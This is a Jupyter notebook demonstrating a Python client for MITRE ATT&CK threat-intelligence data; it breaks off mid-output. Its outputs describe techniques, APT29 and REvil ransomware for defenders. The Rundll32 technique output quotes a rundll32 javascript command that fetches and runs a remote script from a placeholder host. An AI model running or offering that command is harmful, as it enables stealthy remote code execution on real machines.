{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# **MITRE ATT&CK API FILTERS**: Python Client\n",
    "------------------"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Import ATTACK API Client"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {},
   "outputs": [],
   "source": [
    "from attackcti import attack_client"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Import Extra Libraries"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [],
   "source": [
    "from pandas import *"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Initialize ATT&CK Client Variable"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 3,
   "metadata": {},
   "outputs": [],
   "source": [
    "lift = attack_client()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Technique by Name (TAXII)\n",
    "You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 4,
   "metadata": {},
   "outputs": [],
   "source": [
    "technique_name = lift.get_technique_by_name('Rundll32')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 5,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[AttackPattern(type='attack-pattern', id='attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-01-23T18:03:46.248Z', modified='2020-06-20T22:31:42.113Z', name='Rundll32', description='Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\\n\\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\\\..\\\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1218/011', external_id='T1218.011'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Casey Smith', 'Ricardo Dias'], x_mitre_data_sources=['DLL monitoring', 'Loaded DLLs', 'Process command-line parameters', 'Process monitoring'], x_mitre_defense_bypassed=['Digital Certificate Validation', 'Application control', 'Anti-virus'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.0'),\n",
       " AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created='2017-05-31T21:31:06.045Z', modified='2020-01-31T19:01:41.919Z', name='Rundll32', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')])]"
      ]
     },
     "execution_count": 5,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "technique_name"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Data Sources from All Techniques (TAXII)\n",
    "* You can also get all the data sources available in ATT&CK\n",
    "* Currently the only techniques with data sources are the ones in Enterprise ATT&CK."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 6,
   "metadata": {},
   "outputs": [],
   "source": [
    "data_sources = lift.get_data_sources()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 7,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "79"
      ]
     },
     "execution_count": 7,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "len(data_sources)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 8,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['Network device logs',\n",
       " 'Network device run-time memory',\n",
       " 'Network device command history',\n",
       " 'Network device configuration',\n",
       " 'Netflow/Enclave netflow',\n",
       " 'Network protocol analysis',\n",
       " 'Packet capture',\n",
       " 'File monitoring',\n",
       " 'Process monitoring',\n",
       " 'Process command-line parameters',\n",
       " 'AWS CloudTrail logs',\n",
       " 'Azure activity logs',\n",
       " 'GCP audit logs',\n",
       " 'Windows Registry',\n",
       " 'DLL monitoring',\n",
       " 'API monitoring',\n",
       " 'Mail server',\n",
       " 'Email gateway',\n",
       " 'Social media monitoring',\n",
       " 'Web logs',\n",
       " 'SSL/TLS certificates',\n",
       " 'Domain registration',\n",
       " 'Windows event logs',\n",
       " 'Authentication logs',\n",
       " 'Stackdriver logs',\n",
       " 'Process use of network',\n",
       " 'Host network interface',\n",
       " 'Loaded DLLs',\n",
       " 'Anti-virus',\n",
       " 'Binary file metadata',\n",
       " 'Sensor health and status',\n",
       " 'Malware reverse engineering',\n",
       " 'SSL/TLS inspection',\n",
       " 'DNS records',\n",
       " 'PowerShell logs',\n",
       " 'Environment variable',\n",
       " 'Services',\n",
       " 'Web proxy',\n",
       " 'Component firmware',\n",
       " 'BIOS',\n",
       " 'Disk forensics',\n",
       " 'EFI',\n",
       " 'Data loss prevention',\n",
       " 'User interface',\n",
       " 'System calls',\n",
       " 'Network intrusion detection system',\n",
       " 'Detonation chamber',\n",
       " 'Application logs',\n",
       " 'Office 365 account logs',\n",
       " 'Digital certificate logs',\n",
       " 'Kernel drivers',\n",
       " 'Web application firewall logs',\n",
       " 'Office 365 trace logs',\n",
       " 'Access tokens',\n",
       " 'Office 365 audit logs',\n",
       " 'Third-party application logs',\n",
       " 'OAuth audit logs',\n",
       " 'WMI Objects',\n",
       " 'VBR',\n",
       " 'MBR',\n",
       " 'Asset management',\n",
       " 'Windows Error Reporting',\n",
       " 'Browser extensions',\n",
       " 'Named Pipes',\n",
       " 'Alarm history',\n",
       " 'Alarm thresholds',\n",
       " 'Sequential event recorder',\n",
       " 'Data historian',\n",
       " 'Windows registry',\n",
       " 'File Monitoring',\n",
       " 'Controller program',\n",
       " 'Host network interfaces',\n",
       " 'Alarm History',\n",
       " 'Sequential Event Recorder',\n",
       " 'process use of network',\n",
       " 'SSl/TLS inspection',\n",
       " 'Windows error reporting',\n",
       " 'Digital signatures',\n",
       " 'Controller parameters']"
      ]
     },
     "execution_count": 8,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "data_sources"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Any STIX Object by ID (TAXII)\n",
    "* You can get any STIX object by its id across all the matrices. It is case sensitive.\n",
    "* You can use the following STIX Object Types:\n",
    "  * attack-pattern >  techniques\n",
    "  * course-of-action > mitigations\n",
    "  * intrusion-set > groups\n",
    "  * malware\n",
    "  * tool"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 9,
   "metadata": {},
   "outputs": [],
   "source": [
    "object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[AttackPattern(type='attack-pattern', id='attack-pattern--286cc500-4291-45c2-99a1-e760db176402', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-12-14T16:46:06.044Z', modified='2020-10-26T13:42:49.342Z', name='Acquire and/or use 3rd party infrastructure services', description='This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\\n\\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-pre-attack', phase_name='adversary-opsec')], external_references=[ExternalReference(source_name='mitre-pre-attack', url='https://attack.mitre.org/techniques/T1307', external_id='T1307'), ExternalReference(source_name='LUCKYCAT2012', description='Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017.')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_deprecated=True, x_mitre_detectable_by_common_defenses='No', x_mitre_detectable_by_common_defenses_explanation='3rd party services highly leveraged by legitimate services, hard to distinguish from background noise.  While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.', x_mitre_difficulty_for_adversary='Yes', x_mitre_difficulty_for_adversary_explanation='Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.', x_mitre_old_attack_id='PRE-T1084', x_mitre_version='1.0')]"
      ]
     },
     "execution_count": 10,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "object_by_id"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Any Group by Alias (TAXII)\n",
    "You can get any Group by its Alias property across all the matrices. It is case sensitive."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {},
   "outputs": [],
   "source": [
    "group_name = lift.get_group_by_alias('Cozy Bear')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 12,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2020-10-22T19:06:15.392Z', name='APT29', description='[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)', aliases=['APT29', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='ESET Dukes October 2019', description='Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.', url='https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf'), ExternalReference(source_name='NCSC APT29 July 2020', description='National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', url='https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_version='1.4')]"
      ]
     },
     "execution_count": 12,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "group_name"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Relationships by Any Object (TAXII)\n",
    "* You can get available relationships defined in ATT&CK of type **uses** and **mitigates** for specific objects across all the matrices."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 13,
   "metadata": {},
   "outputs": [],
   "source": [
    "groups = lift.get_groups()\n",
    "one_group = groups[0]\n",
    "relationships = lift.get_relationships_by_object(one_group)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 14,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "Relationship(type='relationship', id='relationship--689b0bff-7eb4-4678-997b-64794c56add0', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-09-22T20:17:38.809Z', modified='2020-10-06T15:32:20.360Z', relationship_type='uses', description='[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)', source_ref='intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133', target_ref='attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00', external_references=[ExternalReference(source_name='Secureworks REvil September 2019', description='Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.', url='https://www.secureworks.com/research/revil-sodinokibi-ransomware'), ExternalReference(source_name='Secureworks GandCrab and REvil September 2019', description='Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', url='https://www.secureworks.com/blog/revil-the-gandcrab-connection'), ExternalReference(source_name='Secureworks GOLD SOUTHFIELD', description='Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.', url='https://www.secureworks.com/research/threat-profiles/gold-southfield')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])"
      ]
     },
     "execution_count": 14,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "relationships[0]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get All Techniques with Mitigations (TAXII)\n",
    "The difference with this function and **get_all_techniques()** is that **get_techniques_mitigated_by_all_mitigations** returns techniques that have mitigations mapped to them."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 15,
   "metadata": {},
   "outputs": [],
   "source": [
    "techniques_mitigated = lift.get_techniques_mitigated_by_all_mitigations()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 16,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "AttackPattern(type='attack-pattern', id='attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-10-01T01:17:15.965Z', modified='2020-10-22T18:05:46.296Z', name='Compromise Accounts', description='Before compromising a victim, adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \\n\\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\\n\\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\\n\\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1586', external_id='T1586'), ExternalReference(source_name='AnonHBGary', description='Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.', url='https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Social media monitoring'], x_mitre_detection='Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\\n\\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).', x_mitre_platforms=['PRE'], x_mitre_version='1.0')"
      ]
     },
     "execution_count": 16,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "techniques_mitigated[0]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Techniques Used by Software (TAXII)\n",
    "This the function returns information about a specific software STIX object."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 17,
   "metadata": {},
   "outputs": [],
   "source": [
    "all_software = lift.get_software()\n",
    "one_software = all_software[0]\n",
    "software_techniques = lift.get_techniques_used_by_software(one_software)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 18,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "AttackPattern(type='attack-pattern', id='attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-15T16:13:46.151Z', modified='2020-03-26T20:15:35.821Z', name='Web Protocols', description='Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \\n\\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1071/001', external_id='T1071.001'), ExternalReference(source_name='University of Birmingham C2', description='Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', url='https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Network protocol analysis', 'Process monitoring', 'Process use of network', 'Netflow/Enclave netflow', 'Packet capture'], x_mitre_detection='Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\\n\\nMonitor for web traffic to/from known-bad or suspicious domains. ', x_mitre_is_subtechnique=True, x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')"
      ]
     },
     "execution_count": 18,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "software_techniques[0]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Techniques Used by Group (TAXII)\n",
    "If you do not provide the name of a specific **Group** (Case Sensitive), the function returns information about all the groups available across all the matrices."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 19,
   "metadata": {},
   "outputs": [],
   "source": [
    "groups = lift.get_groups()\n",
    "one_group = groups[0]\n",
    "group_techniques = lift.get_techniques_used_by_group(one_group)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 20,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "AttackPattern(type='attack-pattern', id='attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-11T14:17:21.153Z', modified='2020-03-11T14:17:21.153Z', name='Compromise Software Supply Chain', description='Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\\n\\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1195/002', external_id='T1195.002'), ExternalReference(source_name='Avast CCleaner3 2018', description='Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.', url='https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities'), ExternalReference(source_name='Command Five SK 2011', description='Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.', url='https://www.commandfive.com/papers/C5_APT_SKHack.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['File monitoring', 'Web proxy'], x_mitre_detection='Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ', x_mitre_is_subtechnique=True, x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')"
      ]
     },
     "execution_count": 20,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "group_techniques[0]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Get Software Used by Group (TAXII)\n",
    "You can retrieve every software (malware or tool) mapped to a specific Group STIX object"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 21,
   "metadata": {},
   "outputs": [],
   "source": [
    "groups = lift.get_groups()\n",
    "one_group = groups[0]\n",
    "group_software = lift.get_software_used_by_group(one_group)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 22,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "Malware(type='malware', id='malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-08-04T15:06:14.796Z', modified='2020-10-05T15:52:54.596Z', name='REvil', description='[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)', labels=['malware'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0496', external_id='S0496'), ExternalReference(source_name='Sodin', description='(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)'), ExternalReference(source_name='Sodinokibi', description='(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)'), ExternalReference(source_name='Secureworks REvil September 2019', description='Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.', url='https://www.secureworks.com/research/revil-sodinokibi-ransomware'), ExternalReference(source_name='Intel 471 REvil March 2020', description='Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.', url='https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/'), ExternalReference(source_name='Group IB Ransomware May 2020', description='Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.', url='https://www.group-ib.com/whitepapers/ransomware-uncovered.html'), ExternalReference(source_name='Kaspersky Sodin July 2019', description='Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.', url='https://securelist.com/sodin-ransomware/91473/'), ExternalReference(source_name='G Data Sodinokibi June 2019', description='Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.', url='https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data'), ExternalReference(source_name='Cylance Sodinokibi July 2019', description='Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.', url='https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html'), ExternalReference(source_name='Secureworks GandCrab and REvil September 2019', description='Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', url='https://www.secureworks.com/blog/revil-the-gandcrab-connection'), ExternalReference(source_name='Talos Sodinokibi April 2019', description='Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.', url='https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html'), ExternalReference(source_name='McAfee Sodinokibi October 2019', description='McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.', url='https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/'), ExternalReference(source_name='McAfee REvil October 2019', description='Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.', url='https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/'), ExternalReference(source_name='Picus Sodinokibi January 2020', description='Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.', url='https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware')], 